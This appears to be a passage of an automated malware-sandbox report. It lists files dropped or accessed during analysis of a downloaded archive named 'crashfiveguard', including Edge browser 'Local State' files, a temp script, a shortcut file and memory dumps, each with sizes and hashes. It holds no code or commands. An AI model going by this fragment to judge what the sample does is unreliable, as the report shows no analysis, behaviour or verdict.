SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
8c802ca4127677297519612ee24c2732

SHA1
6701789554190ab64cc1fd77a7b0e2f6a705c3c1

SHA256
ba5951d794e9fa2f8da2f533f7a9c4fae4e3c2fa375341d8684ededb7d97b2e3

SHA512
081a017c2cd0794a516ca264c17f4bfb327c00697e43a560a3bd1116ec50cbb3ee2bb12df3f31bb09d4dc9cae1d270c7ca963d803ae1632544f5c87247608b24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
475d7f8ed49918f6740ae94f4437a55b

SHA1
b523c5bd20baa3f6affc504b4922f010a0839624

SHA256
4a13246fe0009c5a8e83a23a10643e418c479ad005db7b948ccc960cf076f87a

SHA512
9477958185caa80172af6f166046626f18d24ff6bc2d90ea4fcc748bea0980f6cbb14371771cf5f49ea546bf7a6b44b1daab8baa338157c0a9ae872438540a5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
f6931ecd64628ea206ddcb11ca564171

SHA1
35e8d529cfecc6354eb5c57bcefd4237de343bdb

SHA256
f05e1e85c3b698194a7710111c928a1b47c2f3f7afab3288559394e43b478b2b

SHA512
c161351d5f90d35be41ab1dae410655aa5c03c8d5e62614c560a677fed5a338b6b40547787c90230cfeaeafb7e03e203507492479a7308439fbfdc2b4466a959

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y3fztrpu.fta.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesasd.txt

Filesize
52KB

MD5
11007bb286caf468648bfdb698077dbe

SHA1
c75bacef9096d5e8d3613e062ca10acb492a2d88

SHA256
04864cb1cc9647bd297b3bf8818595fc65d870a8fa74ee3a420fedfcafdfa292

SHA512
8ef29a7c561a224fca5ff289103b7c8e84c12f92e954bc3751907c430562f42c018aa8f5d7599852dea17bccf93e5fbb2e47cc75ba9ce377b58981f011e2ac17

Download Submit
C:\Users\Admin\Downloads\crashfiveguard (2).rar

Filesize
47KB

MD5
109345152371bff65243158a220e6eb1

SHA1
b05b7abe782ef7bd89f04b1a0bf1e2f69291ec95

SHA256
1cca7067666f4730059e1eebe5f3346c139d13ebc6febda5d43ec6e3e782dcec

SHA512
6b93c76fb6afe1d5acfb7d68ebbb5eb95dae251386200ce59442ce3f6e16221c2a3a21a66ba1adb835939281c5f416fb6c7155ea94335254d9d44eb468dace52

Download Submit
C:\Users\Admin\Downloads\crashfiveguard (2)\example.lnk

Filesize
106KB

MD5
6975af881b0b0e3751002dcc064b886a

SHA1
fa4fe5dfc3897677ee5b5c69cd189e4167427d37

SHA256
f5e258657d2fff2421af1045023ed6ffa0b2c5bdbee9cb186f143ee47320b0a3

SHA512
6ffa48d6d88ea3466a23e793aaca6288e4175c3cae4daa695213aaaa747077795ec5ea5aad0fb666aa59dff14922c8ef70f39245bafed5f891bf815e6eafb587

Download Submit
memory/444-207-0x0000000000A20000-0x0000000000A30000-memory.dmp

Filesize
64KB

Download
memory/5312-190-0x000001D2753E0000-0x000001D275402000-memory.dmp

Filesize
136KB

Download
memory/5312-210-0x000001D25C540000-0x000001D25D001000-memory.dmp

Filesize
10.8MB

Download
memory/5312-211-0x000001D25C540000-0x000001D25D001000-memory.dmp

Filesize
10.8MB

Download
memory/5312-218-0x000001D25C540000-0x000001D25D001000-memory.dmp

Filesize
10.8MB

Download